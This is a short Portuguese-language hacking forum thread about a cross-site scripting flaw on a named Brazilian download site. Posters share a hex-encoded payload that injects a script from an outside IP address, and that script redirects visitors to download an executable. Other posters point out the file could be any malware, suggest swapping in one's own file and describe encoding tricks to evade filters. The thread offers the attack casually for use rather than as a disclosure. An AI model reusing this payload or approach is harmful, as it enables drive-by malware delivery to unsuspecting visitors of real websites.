www.superdownloads.com.br XSS

Iniciado por Mateus, 26 de Junho , 2008, 06:39:31 PM

tópico anterior - próximo tópico

0 Membros e 2 Visitantes estão vendo este tópico.


Wuefez



"Quem fala não faz."

vaikarai

Citação de: "Wuefez"Explica mais o Zé Bunda.

ele so transformo o string ">
em Hex
que deu esse rezutado:
22 3E 3C 73 63 72 69 70 74 20 73 72 63 3D 22 68 74 74 70 3A 2F 2F 32 31 33 2E 33 2E 37 2E 31 31 31 2F 31 2E 6A 73 22 3E 3C 2F 73 63 72 69 70 74 3E
e coloco os _22_3E_ e assim por diante..

vaikarai

Ops esquecie de finalizar,
E dentro do http://213.3.7.111/1.js tem esse pequeno comando.
location.replace('http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe');
onde faz baixar o putty.exe
^^

saint

e esse putty é o que, programa.........o que é
Superar a fraqueza de todos os mortais...

Mateus

o putty no caso é o próprio putty mas poderia ser um malware qualquer
H4X with axes 8)

rog

muito bom memo

esses dias o site da microsoft tinha uma falha parecida

rog
realty.sys is corrupt :  reboot the universe (Y/N)

blackwinner

É, seria interessante trocar o link do download pelo link do seu arquivo. ::)
sergaralho.blogspot.com --> a informação como ela deve ser.. pura!


L3m4rk


Mateus

eu poderia fazer um calculo gigante como bfox gosta mas prefiro de uma maneira mais inteligente.

http://ha.ckers.org/xss.html tá lá no fundo =D

depois é só usar o notepad para substituir os % por :)
H4X with axes 8)